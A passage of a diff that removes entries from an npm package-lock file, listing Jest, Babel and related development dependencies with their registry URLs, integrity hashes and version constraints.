"https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - 